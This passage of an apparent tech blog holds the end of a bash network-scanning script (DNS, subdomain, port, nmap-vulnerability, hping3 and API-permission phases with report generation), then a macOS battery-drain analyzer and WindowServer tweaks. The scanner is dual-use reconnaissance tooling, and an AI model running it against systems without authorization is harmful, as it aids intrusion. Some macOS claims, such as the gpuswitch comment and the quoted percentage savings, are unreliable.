log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}
################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
log_info "Generating detailed technical report..."
log_debug "Creating technical report"
cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN
**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL
---
## 1. Scope
**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")
---
## 2. DNS Configuration
\`\`\`
$(cat dns_records.txt)
\`\`\`
---
## 3. SSL/TLS Configuration
\`\`\`
$(cat certificate_details.txt)
\`\`\`
---
## 4. Port Scan Results
\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`
---
## 5. Vulnerability Assessment
EOF
if [ "$VULN_SCAN" = true ]; then
cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan
\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`
### 5.2 HTTP Vulnerabilities
\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`
### 5.3 SSL/TLS Vulnerabilities
\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`
EOF
fi
cat >> "$TECH_REPORT" << EOF
---
## 6. Asset Discovery
### 6.1 Web Technologies
\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`
### 6.2 CMS Detection
\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`
### 6.3 JavaScript Libraries
\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`
### 6.4 Common Files
\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`
---
## 7. Outdated Software
EOF
if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
for file in old_software/*.txt; do
if [ -f "$file" ] && [ -s "$file" ]; then
echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
echo "\`\`\`" >> "$TECH_REPORT"
cat "$file" >> "$TECH_REPORT"
echo "\`\`\`" >> "$TECH_REPORT"
echo >> "$TECH_REPORT"
fi
done
else
echo "No outdated software detected." >> "$TECH_REPORT"
fi
cat >> "$TECH_REPORT" << EOF
---
## 8. API Security
EOF
if [ "$API_SCAN" = true ]; then
cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints
\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`
### 8.2 API Permissions
\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`
### 8.3 CORS Configuration
\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`
EOF
fi
cat >> "$TECH_REPORT" << EOF
---
## 9. HTTP Security Headers
\`\`\`
$(cat http_headers.txt)
\`\`\`
**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`
---
## 10. Recommendations
### 10.1 Immediate Actions
EOF
# Add recommendations
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
fi
if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
fi
if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
echo "3. Update outdated software components" >> "$TECH_REPORT"
fi
cat >> "$TECH_REPORT" << EOF
### 10.2 Review Actions
1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Regular security assessments
---
## 11. Document Control
**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)
---
**END OF TECHNICAL REPORT**
EOF
log_success "Technical report generated: $TECH_REPORT"
log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}
################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
if [ "$VULN_SCAN" = false ]; then
log_debug "Vulnerability scanning disabled, skipping vulnerability report"
return
fi
log_info "Generating vulnerability report..."
log_debug "Creating vulnerability report"
cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN
**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION
---
## Executive Summary
**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)
---
## 1. NMAP Vulnerability Scan
\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`
---
## 2. HTTP Vulnerabilities
\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`
---
## 3. SSL/TLS Vulnerabilities
\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`
---
## 4. Detailed Findings
\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`
---
**END OF VULNERABILITY REPORT**
EOF
log_success "Vulnerability report generated: $VULN_REPORT"
log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}
################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
if [ "$API_SCAN" = false ]; then
log_debug "API scanning disabled, skipping API report"
return
fi
log_info "Generating API security report..."
log_debug "Creating API security report"
cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN
**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION
---
## 1. API Discovery
### 1.1 Endpoints Found
\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`
---
## 2. Permission Testing
### 2.1 Unauthenticated Access
\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`
### 2.2 HTTP Method Issues
\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`
---
## 3. CORS Configuration
\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS issues found")
\`\`\`
---
**END OF API SECURITY REPORT**
EOF
log_success "API security report generated: $API_REPORT"
log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}
################################################################################
# Main Execution
################################################################################
main() {
echo "========================================"
echo "Enhanced Security Scanner v${VERSION}"
echo "========================================"
echo
log_debug "Script started at $(date)"
log_debug "Network interface: $NETWORK_INTERFACE"
log_debug "Debug mode: $DEBUG"
echo
# Check dependencies
check_dependencies
# Initialize scan
initialize_scan
# Run scans
log_debug "Starting DNS reconnaissance phase"
dns_reconnaissance
log_debug "Starting subdomain discovery phase"
discover_subdomains
log_debug "Starting SSL/TLS analysis phase"
ssl_tls_analysis
log_debug "Starting port scanning phase"
port_scanning
if [ "$VULN_SCAN" = true ]; then
log_debug "Starting vulnerability scanning phase"
vulnerability_scanning
fi
log_debug "Starting hping3 testing phase"
hping3_testing
log_debug "Starting asset discovery phase"
asset_discovery
log_debug "Starting old software detection phase"
detect_old_software
if [ "$API_SCAN" = true ]; then
log_debug "Starting API discovery phase"
api_discovery
log_debug "Starting API permission testing phase"
api_permission_testing
fi
log_debug "Starting HTTP security headers analysis phase"
http_security_headers
log_debug "Starting subdomain scanning phase"
scan_subdomains
# Generate reports
log_debug "Starting report generation phase"
generate_executive_summary
generate_technical_report
generate_vulnerability_report
generate_api_report
# Summary
echo
echo "========================================"
log_success "Scan Complete!"
echo "========================================"
echo
log_info "Scan directory: $SCAN_DIR"
log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
if [ "$VULN_SCAN" = true ]; then
log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
fi
if [ "$API_SCAN" = true ]; then
log_info "API security report: $SCAN_DIR/$API_REPORT"
fi
echo
log_info "Review the reports for detailed findings"
log_debug "Script completed at $(date)"
}
################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false
while getopts "d:sm:vah" opt; do
case $opt in
d)
DOMAIN="$OPTARG"
;;
s)
SCAN_SUBDOMAINS=true
;;
m)
MAX_SUBDOMAINS="$OPTARG"
;;
v)
VULN_SCAN=true
;;
a)
API_SCAN=true
;;
h)
usage
;;
\?)
log_error "Invalid option: -$OPTARG"
usage
;;
esac
done
# Validate required arguments
if [ -z "$DOMAIN" ]; then
log_error "Domain is required"
usage
fi
# Run main function
main
EOF
chmod +x ./security_scanner_enhanced.sh
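With the script saved and made executable, a typical invocation looks like the following. The flags come straight from the getopts block above (-d domain, -s scan subdomains, -m max subdomains, -v vulnerability scan, -a API scan); running with sudo is a reasonable default since hping3 and some nmap phases need raw-socket privileges. The exact help text depends on the usage() function defined earlier in the script.

# Full assessment of an authorized target: subdomains (capped at 20), vulnerability and API phases
sudo ./security_scanner_enhanced.sh -d example-target.com -s -m 20 -v -a

# Minimal run: domain only, no subdomain/vulnerability/API phases
./security_scanner_enhanced.sh -d example-target.com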

MacBook: A script to figure out which processes are causing battery usage/drain issues (even when the laptop lid is closed)

If you’re trying to figure out what’s draining your MacBook, even when the lid is closed, the script below generates a full report; run it with “sudo ./battery_drain_analyzer.sh”.
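Before running the full analyzer, two quick manual checks will often reveal the culprit on their own (both commands are used again inside the script):

# List the processes currently holding power assertions (i.e. blocking sleep)
pmset -g assertions | grep -i "prevent"

# Show the most recent wake events and what triggered them
pmset -g log | grep -E "Wake from|DarkWake" | tail -10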

cat > ~/battery_drain_analyzer.sh << 'BATTERY_EOF'  # outer delimiter must differ from the inner EOF markers used by the report heredocs
#!/bin/bash
# Battery Drain Analyzer for macOS
# This script analyzes processes and settings that affect battery life,
# especially when the laptop lid is closed.
# Colors for terminal output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
# Output file
REPORT_FILE="battery_drain_report_$(date +%Y%m%d_%H%M%S).md"
TEMP_DIR=$(mktemp -d)
echo -e "${GREEN}Battery Drain Analyzer${NC}"
echo "Collecting system information..."
echo "This may take a minute and will require administrator privileges for some checks."
echo ""
# Function to check if running with sudo
check_sudo() {
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Some metrics require sudo access. Re-running with sudo...${NC}"
sudo "$0" "$@"
exit $?
fi
}
# Start the report
cat > "$REPORT_FILE" << EOF
# Battery Drain Analysis Report
**Generated:** $(date '+%Y-%m-%d %H:%M:%S %Z')  
**System:** $(sysctl -n hw.model)  
**macOS Version:** $(sw_vers -productVersion)  
**Uptime:** $(uptime | sed 's/.*up //' | sed 's/,.*//')
---
## Executive Summary
This report analyzes processes and settings that consume battery power, particularly when the laptop lid is closed.
EOF
# 1. Check current power assertions
echo "Checking power assertions..."
cat >> "$REPORT_FILE" << EOF
## 🔋 Current Power State
### Active Power Assertions
Power assertions prevent your Mac from sleeping. Here's what's currently active:
\`\`\`
EOF
pmset -g assertions | grep -A 20 "Listed by owning process:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 2. Check sleep prevention
SLEEP_STATUS=$(pmset -g | grep "sleep" | head -1)
if [[ $SLEEP_STATUS == *"sleep prevented"* ]]; then
echo "" >> "$REPORT_FILE"
echo "⚠️ **WARNING:** Sleep is currently being prevented!" >> "$REPORT_FILE"
fi
# 3. Analyze power settings
echo "Analyzing power settings..."
cat >> "$REPORT_FILE" << EOF
## ⚙️ Power Management Settings
### Current Power Profile
\`\`\`
EOF
pmset -g >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# Identify problematic settings
cat >> "$REPORT_FILE" << EOF
### Problematic Settings for Battery Life
EOF
POWERNAP=$(pmset -g | grep "powernap" | awk '{print $2}')
TCPKEEPALIVE=$(pmset -g | grep "tcpkeepalive" | awk '{print $2}')
WOMP=$(pmset -g | grep "womp" | awk '{print $2}')
STANDBY=$(pmset -g | grep "standby" | awk '{print $2}')
if [[ "$POWERNAP" == "1" ]]; then
echo "- ❌ **Power Nap is ENABLED** - Allows Mac to wake for updates (HIGH battery drain)" >> "$REPORT_FILE"
else
echo "- ✅ Power Nap is disabled" >> "$REPORT_FILE"
fi
if [[ "$TCPKEEPALIVE" == "1" ]]; then
echo "- ⚠️ **TCP Keep-Alive is ENABLED** - Maintains network connections during sleep (MEDIUM battery drain)" >> "$REPORT_FILE"
else
echo "- ✅ TCP Keep-Alive is disabled" >> "$REPORT_FILE"
fi
if [[ "$WOMP" == "1" ]]; then
echo "- ⚠️ **Wake on LAN is ENABLED** - Allows network wake (MEDIUM battery drain)" >> "$REPORT_FILE"
else
echo "- ✅ Wake on LAN is disabled" >> "$REPORT_FILE"
fi
# 4. Collect CPU usage data
echo "Collecting CPU usage data..."
cat >> "$REPORT_FILE" << EOF
## 📊 Top Battery-Draining Processes
### Current CPU Usage (Higher CPU = More Battery Drain)
EOF
# Get top processes by CPU
top -l 2 -n 20 -o cpu -stats pid,command,cpu,mem,purg,user | tail -n 21 > "$TEMP_DIR/top_output.txt"
# Parse and format top output
echo "| PID | Process | CPU % | Memory | User |" >> "$REPORT_FILE"
echo "|-----|---------|-------|--------|------|" >> "$REPORT_FILE"
tail -n 20 "$TEMP_DIR/top_output.txt" | while read line; do
if [[ ! -z "$line" ]] && [[ "$line" != *"PID"* ]]; then
PID=$(echo "$line" | awk '{print $1}')
PROCESS=$(echo "$line" | awk '{print $2}' | cut -c1-30)
CPU=$(echo "$line" | awk '{print $3}')
MEM=$(echo "$line" | awk '{print $4}')
USER=$(echo "$line" | awk '{print $NF}')
# Highlight high CPU processes
# Use awk for floating point comparison to avoid bc dependency
if awk "BEGIN {exit !($CPU > 10.0)}" 2>/dev/null; then
echo "| $PID | **$PROCESS** | **$CPU** | $MEM | $USER |" >> "$REPORT_FILE"
else
echo "| $PID | $PROCESS | $CPU | $MEM | $USER |" >> "$REPORT_FILE"
fi
fi
done
# 5. Check for power metrics (if available with sudo)
if [[ $EUID -eq 0 ]]; then
echo "Collecting detailed power metrics..."
cat >> "$REPORT_FILE" << EOF
### Detailed Power Consumption Analysis
EOF
# Run powermetrics for 2 seconds
powermetrics --samplers tasks --show-process-energy -i 2000 -n 1 2>/dev/null > "$TEMP_DIR/powermetrics.txt"
if [[ -s "$TEMP_DIR/powermetrics.txt" ]]; then
echo '```' >> "$REPORT_FILE"
grep -A 30 -F "*** Running tasks ***" "$TEMP_DIR/powermetrics.txt" | head -35 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
fi
fi
# 6. Check wake reasons
echo "Analyzing wake patterns..."
cat >> "$REPORT_FILE" << EOF
## 💤 Sleep/Wake Analysis
### Recent Wake Events
These events show why your Mac woke from sleep:
\`\`\`
EOF
pmset -g log | grep -E "Wake from|DarkWake|Notification" | tail -10 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 7. Check scheduled wake events
cat >> "$REPORT_FILE" << EOF
### Scheduled Wake Requests
These are processes that have requested to wake your Mac:
\`\`\`
EOF
pmset -g log | grep "Wake Requests" | tail -5 >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 8. Background services analysis
echo "Analyzing background services..."
cat >> "$REPORT_FILE" << EOF
## 🔄 Background Services Analysis
### Potentially Problematic Services
EOF
# Check for common battery-draining services
SERVICES_TO_CHECK=(
"Spotlight:mds_stores"
"Time Machine:backupd"
"Photos:photoanalysisd"
"iCloud:bird"
"CrowdStrike:falcon"
"Dropbox:Dropbox"
"Google Drive:Google Drive"
"OneDrive:OneDrive"
"Creative Cloud:Creative Cloud"
"Docker:com.docker"
"Parallels:prl_"
"VMware:vmware"
"Spotify:Spotify"
"Slack:Slack"
"Microsoft Teams:Teams"
"Zoom:zoom.us"
"Chrome:Google Chrome"
"Edge:Microsoft Edge"
)
echo "| Service | Status | Impact |" >> "$REPORT_FILE"
echo "|---------|--------|--------|" >> "$REPORT_FILE"
for service in "${SERVICES_TO_CHECK[@]}"; do
IFS=':' read -r display_name process_name <<< "$service"
# Use pgrep with fixed string matching to avoid regex issues
if pgrep -qfi "$process_name" 2>/dev/null; then
# Get CPU usage for this process (escape special characters)
escaped_name=$(printf '%s\n' "$process_name" | sed 's/[[\.*^$()+?{|]/\\&/g')
CPU_USAGE=$(ps aux | grep -i "$escaped_name" | grep -v grep | awk '{sum+=$3} END {print sum}')
if [[ -z "$CPU_USAGE" ]]; then
CPU_USAGE="0"
fi
# Determine impact level
# Use awk for floating point comparison
if awk "BEGIN {exit !($CPU_USAGE > 20.0)}" 2>/dev/null; then
IMPACT="HIGH ⚠️"
elif awk "BEGIN {exit !($CPU_USAGE > 5.0)}" 2>/dev/null; then
IMPACT="MEDIUM"
else
IMPACT="LOW"
fi
echo "| $display_name | Running (${CPU_USAGE}% CPU) | $IMPACT |" >> "$REPORT_FILE"
fi
done
# 9. Battery health check
echo "Checking battery health..."
cat >> "$REPORT_FILE" << EOF
## 🔋 Battery Health Status
\`\`\`
EOF
system_profiler SPPowerDataType | grep -A 20 "Battery Information:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"
# 10. Recommendations
cat >> "$REPORT_FILE" << EOF
## 💡 Recommendations
### Immediate Actions to Improve Battery Life
#### Critical (Do These First):
EOF
# Generate recommendations based on findings
if [[ "$POWERNAP" == "1" ]]; then
cat >> "$REPORT_FILE" << EOF
1. **Disable Power Nap**
\`\`\`bash
sudo pmset -a powernap 0
\`\`\`
EOF
fi
if [[ "$TCPKEEPALIVE" == "1" ]]; then
cat >> "$REPORT_FILE" << EOF
2. **Disable TCP Keep-Alive**
\`\`\`bash
sudo pmset -a tcpkeepalive 0
\`\`\`
EOF
fi
if [[ "$WOMP" == "1" ]]; then
cat >> "$REPORT_FILE" << EOF
3. **Disable Wake for Network Access**
\`\`\`bash
sudo pmset -a womp 0
\`\`\`
EOF
fi
cat >> "$REPORT_FILE" << EOF
#### Additional Optimizations:
4. **Reduce Display Sleep Time**
\`\`\`bash
sudo pmset -a displaysleep 5
\`\`\`
5. **Enable Automatic Graphics Switching** (if available)
\`\`\`bash
sudo pmset -a gpuswitch 2
\`\`\`
6. **Set Faster Standby Delay**
\`\`\`bash
sudo pmset -a standbydelay 1800  # 30 minutes
\`\`\`
### Process-Specific Recommendations:
EOF
# Check for specific high-drain processes and provide detailed solutions
if pgrep -q "mds_stores" 2>/dev/null; then
cat >> "$REPORT_FILE" << EOF
#### 🔍 **Spotlight Indexing Detected**
**Problem:** Spotlight is actively indexing your drive, consuming significant CPU and battery.
**Solutions:**
- **Temporary pause:** \`sudo mdutil -a -i off\` (re-enable with \`on\`)
- **Check indexing status:** \`mdutil -s /\`
- **Rebuild index if stuck:** \`sudo mdutil -E /\`
- **Exclude folders:** System Settings > Siri & Spotlight > Spotlight Privacy
EOF
fi
if pgrep -q "backupd" 2>/dev/null; then
cat >> "$REPORT_FILE" << EOF
#### 💾 **Time Machine Backup Running**
**Problem:** Active backup consuming resources.
**Solutions:**
- **Skip current backup:** Click Time Machine icon > Skip This Backup
- **Schedule for AC power:** \`sudo defaults write /Library/Preferences/com.apple.TimeMachine RequiresACPower -bool true\`
- **Reduce backup frequency:** Use TimeMachineEditor app
- **Check backup size:** \`tmutil listbackups | tail -1 | xargs tmutil calculatedrift\`
EOF
fi
if pgrep -q "photoanalysisd" 2>/dev/null; then
cat >> "$REPORT_FILE" << EOF
#### 📸 **Photos Library Analysis Active**
**Problem:** Photos app analyzing images for faces, objects, and scenes.
**Solutions:**
- **Pause temporarily:** Quit Photos app completely
- **Disable features:** Photos > Settings > uncheck "Enable Machine Learning"
- **Process overnight:** Leave Mac plugged in overnight to complete
- **Check progress:** Activity Monitor > Search "photo"
EOF
fi
# Check for additional common issues
if pgrep -q "kernel_task" 2>/dev/null && [[ $(ps aux | grep "kernel_task" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 50 ]]; then
cat >> "$REPORT_FILE" << EOF
#### 🔥 **High kernel_task CPU Usage**
**Problem:** System thermal management or driver issues.
**Solutions:**
- **Reset SMC:** Shut down > Press & hold Shift-Control-Option-Power for 10s
- **Check temperatures:** \`sudo powermetrics --samplers smc | grep temp\`
- **Disconnect peripherals:** Especially USB-C hubs and external displays
- **Update macOS:** Check for system updates
- **Safe mode test:** Restart holding Shift key
EOF
fi
if pgrep -q "WindowServer" 2>/dev/null && [[ $(ps aux | grep "WindowServer" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 30 ]]; then
cat >> "$REPORT_FILE" << EOF
#### 🖥️ **High WindowServer Usage**
**Problem:** Graphics rendering issues or display problems.
**Solutions:**
- **Reduce transparency:** System Settings > Accessibility > Display > Reduce transparency
- **Close visual apps:** Quit apps with animations or video
- **Reset display settings:** Option-click Scaled in Display settings
- **Disable display sleep prevention:** \`pmset -g assertions | grep -i display\`
EOF
fi
# 11. Battery drain score
echo "Calculating battery drain score..."
cat >> "$REPORT_FILE" << EOF
## 📈 Overall Battery Drain Score
EOF
# Calculate score (0-100, where 100 is worst)
SCORE=0
[[ "$POWERNAP" == "1" ]] && SCORE=$((SCORE + 30))
[[ "$TCPKEEPALIVE" == "1" ]] && SCORE=$((SCORE + 15))
[[ "$WOMP" == "1" ]] && SCORE=$((SCORE + 10))
# Add points for running services
pgrep -q "mds_stores" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "backupd" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "photoanalysisd" 2>/dev/null && SCORE=$((SCORE + 5))
pgrep -q "falcon" 2>/dev/null && SCORE=$((SCORE + 10))
# Determine rating
if [[ $SCORE -lt 20 ]]; then
RATING="✅ **EXCELLENT** - Minimal battery drain expected"
elif [[ $SCORE -lt 40 ]]; then
RATING="👍 **GOOD** - Some optimization possible"
elif [[ $SCORE -lt 60 ]]; then
RATING="⚠️ **FAIR** - Noticeable battery drain"
else
RATING="❌ **POOR** - Significant battery drain"
fi
cat >> "$REPORT_FILE" << EOF
**Battery Drain Score: $SCORE/100**  
**Rating: $RATING**
Higher scores indicate more battery drain. A score above 40 suggests optimization is needed.
---
## 📝 How to Use This Report
1. Review the **Executive Summary** for quick insights
2. Check **Problematic Settings** and apply recommended fixes
3. Identify high CPU processes in the **Top Battery-Draining Processes** section
4. Follow the **Recommendations** in order of priority
5. Re-run this script after making changes to measure improvement
## 🛠️ Common Battery Issues & Solutions
### 🔴 Critical Issues (Fix Immediately)
#### Sleep Prevention Issues
**Symptoms:** Mac won't sleep, battery drains with lid closed
**Diagnosis:** \`pmset -g assertions\`
**Solutions:**
- Kill preventing apps: \`pmset -g assertions | grep -i prevent\`
- Force sleep: \`pmset sleepnow\`
- Reset power management: \`sudo pmset -a restoredefaults\`
#### Runaway Processes
**Symptoms:** Fan running constantly, Mac gets hot, rapid battery drain
**Diagnosis:** \`top -o cpu\` or Activity Monitor
**Solutions:**
- Force quit: \`kill -9 [PID]\` or Activity Monitor > Force Quit
- Disable startup items: System Settings > General > Login Items
- Clean launch agents: \`ls ~/Library/LaunchAgents\`
### 🟡 Common Issues
#### Bluetooth Battery Drain
**Problem:** Bluetooth constantly searching for devices
**Solutions:**
- Reset Bluetooth module: Shift+Option click BT icon > Reset
- Remove unused devices: System Settings > Bluetooth
- Disable when not needed: \`sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState 0\`
#### Safari/Chrome High Energy Use
**Problem:** Browser tabs consuming excessive resources
**Solutions:**
- Use Safari over Chrome (more efficient on Mac)
- Install ad blockers to reduce JavaScript load
- Limit tabs: Use OneTab or similar extension
- Disable auto-play: Safari > Settings > Websites > Auto-Play
#### External Display Issues
**Problem:** Discrete GPU activation draining battery
**Solutions:**
- Use single display when on battery
- Lower resolution: System Settings > Displays
- Use clamshell mode efficiently
- Check GPU: \`pmset -g\` look for gpuswitch
#### Cloud Sync Services
**Problem:** Continuous syncing draining battery
**Solutions:**
- **iCloud:** System Settings > Apple ID > iCloud > Optimize Mac Storage
- **Dropbox:** Pause sync or use selective sync
- **OneDrive:** Pause syncing when on battery
- **Google Drive:** File Stream > Preferences > Bandwidth settings
### 🟢 Preventive Measures
#### Daily Habits
- Close apps instead of just minimizing
- Disconnect peripherals when not in use
- Use Safari for better battery life
- Enable Low Power Mode when unplugged
- Reduce screen brightness (saves 10-20% battery)
#### Weekly Maintenance
- Restart Mac weekly to clear memory
- Check Activity Monitor for unusual processes
- Update apps and macOS regularly
- Clear browser cache and cookies
- Review login items and launch agents
#### Monthly Checks
- Calibrate battery (full discharge and charge)
- Clean fans and vents for better cooling
- Review and remove unused apps
- Check storage (full drives impact performance)
- Run Disk Utility First Aid
### Quick Fix Scripts
#### 🚀 Basic Optimization (Safe)
Save and run this script to apply all recommended power optimizations:
\`\`\`bash
#!/bin/bash
# Apply all power optimizations
sudo pmset -a powernap 0
sudo pmset -a tcpkeepalive 0
sudo pmset -a womp 0
sudo pmset -a standbydelay 1800
sudo pmset -a displaysleep 5
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
echo "Power optimizations applied!"
\`\`\`
#### 💪 Aggressive Battery Saving
For maximum battery life (may affect convenience):
\`\`\`bash
#!/bin/bash
# Aggressive battery saving settings
sudo pmset -b displaysleep 2
sudo pmset -b disksleep 10
sudo pmset -b sleep 5
sudo pmset -b powernap 0
sudo pmset -b tcpkeepalive 0
sudo pmset -b womp 0
sudo pmset -b ttyskeepawake 0
sudo pmset -b gpuswitch 0  # Force integrated GPU
sudo pmset -b hibernatemode 25  # Hibernate only mode
echo "Aggressive battery settings applied!"
\`\`\`
#### 🔄 Reset to Defaults
To restore factory power settings:
\`\`\`bash
#!/bin/bash
sudo pmset -a restoredefaults
echo "Power settings restored to defaults"
\`\`\`
---
*Report generated by Battery Drain Analyzer v1.0*
EOF
# Cleanup
rm -rf "$TEMP_DIR"
# Summary
echo ""
echo -e "${GREEN}✅ Analysis Complete!${NC}"
echo "Report saved to: $REPORT_FILE"
echo ""
echo "Key findings:"
[[ "$POWERNAP" == "1" ]] && echo -e "${RED}  ❌ Power Nap is enabled (HIGH drain)${NC}"
[[ "$TCPKEEPALIVE" == "1" ]] && echo -e "${YELLOW}  ⚠️ TCP Keep-Alive is enabled (MEDIUM drain)${NC}"
[[ "$WOMP" == "1" ]] && echo -e "${YELLOW}  ⚠️ Wake on LAN is enabled (MEDIUM drain)${NC}"
echo ""
echo "To view the full report:"
echo "  cat $REPORT_FILE"
echo ""
echo "To apply all recommended fixes:"
echo "  sudo pmset -a powernap 0 tcpkeepalive 0 womp 0"
BATTERY_EOF
chmod +x ~/battery_drain_analyzer.sh

If you see WindowServer as your top consumer, then consider the following:

# 1. Restart WindowServer (logs you out!)
sudo killall -HUP WindowServer
# 2. Reduce transparency
defaults write com.apple.universalaccess reduceTransparency -bool true
# 3. Disable animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
# 4. Reset display preferences
rm ~/Library/Preferences/com.apple.windowserver.plist
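To see whether any of this helps, sample WindowServer’s CPU usage before and after making the changes; a plain ps/awk one-liner is enough:

# Print WindowServer's current CPU percentage (the [W] trick stops the pipeline matching itself)
ps aux | awk '/[W]indowServer/ {print $3 "%"}'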

Finer-grained optimisations:

#!/bin/bash
echo "🔧 Applying ALL WindowServer Optimizations for M3 MacBook Pro..."
echo "This will reduce power consumption significantly"
echo ""
# ============================================
# VISUAL EFFECTS & ANIMATIONS (30-40% reduction)
# ============================================
echo "Disabling visual effects and animations..."
# Reduce transparency and motion
defaults write com.apple.universalaccess reduceTransparency -bool true
defaults write com.apple.universalaccess reduceMotion -bool true
defaults write com.apple.Accessibility ReduceMotionEnabled -int 1
# Disable smooth scrolling and window animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
defaults write NSGlobalDomain NSScrollAnimationEnabled -bool false
defaults write NSGlobalDomain NSScrollViewRubberbanding -bool false
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
defaults write NSGlobalDomain NSDocumentRevisionsWindowTransformAnimation -bool false
defaults write NSGlobalDomain NSToolbarFullScreenAnimationDuration -float 0
defaults write NSGlobalDomain NSBrowserColumnAnimationSpeedMultiplier -float 0
# Dock optimizations
defaults write com.apple.dock autohide-time-modifier -float 0
defaults write com.apple.dock launchanim -bool false
defaults write com.apple.dock mineffect -string "scale"
defaults write com.apple.dock show-recents -bool false
defaults write com.apple.dock expose-animation-duration -float 0.1
defaults write com.apple.dock hide-mirror -bool true
# Mission Control optimizations
defaults write com.apple.dock expose-group-by-app -bool false
defaults write com.apple.dock mru-spaces -bool false
defaults write com.apple.dock dashboard-in-overlay -bool true
# Finder optimizations
defaults write com.apple.finder DisableAllAnimations -bool true
defaults write com.apple.finder AnimateWindowZoom -bool false
defaults write com.apple.finder AnimateInfoPanes -bool false
defaults write com.apple.finder FXEnableSlowAnimation -bool false
# Quick Look animations
defaults write -g QLPanelAnimationDuration -float 0
# Mail animations
defaults write com.apple.mail DisableReplyAnimations -bool true
defaults write com.apple.mail DisableSendAnimations -bool true
# ============================================
# M3-SPECIFIC OPTIMIZATIONS (10-15% reduction)
# ============================================
echo "Applying M3-specific optimizations..."
# Disable font smoothing (M3 handles text well without it)
defaults -currentHost write NSGlobalDomain AppleFontSmoothing -int 0
defaults write NSGlobalDomain CGFontRenderingFontSmoothingDisabled -bool true
# Optimize for battery when unplugged
sudo pmset -b gpuswitch 0  # Use efficiency cores more
